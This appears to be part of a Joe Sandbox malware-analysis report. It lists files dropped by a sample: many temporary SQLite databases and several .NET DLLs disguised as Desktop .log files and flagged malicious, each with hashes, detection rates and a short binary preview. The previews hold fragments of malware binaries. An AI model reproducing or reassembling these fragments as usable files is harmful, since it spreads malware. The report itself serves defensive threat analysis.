                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wTUl5LNyXH

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wctTHD0KTs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wg0X6trmDP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wnP1Hfpzy3

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wtaW2RKcfu

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\x3GokrZeop

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\xApn7ahirs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\xMp1OeNgj4

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\xl4ob2zZUK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\xtTS3Rdgg1

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\y5vC6cqevQ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\yF9miDZTtc

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\yI2vvASR0U

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ytbgogNwOU

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\zITDidHVta

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\zU0dlWrFnv

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\CvvLBlqK.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                                                • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                                                                • Filename: FYKrlfQrxb.exe, Detection: malicious, Browse
                                                                                                • Filename: PlZA6b48MW.exe, Detection: malicious, Browse
                                                                                                • Filename: 3XtEci4Mmo.exe, Detection: malicious, Browse
                                                                                                • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                                                                • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                                                                • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                                                                • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                                                                • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\FyhuXVvF.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                C:\Users\user\Desktop\GvICsVKA.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\HupKRiKa.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\IitSDvGY.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):89600
                                                                                                Entropy (8bit):5.905167202474779
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                MD5:06442F43E1001D860C8A19A752F19085
                                                                                                SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 16%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

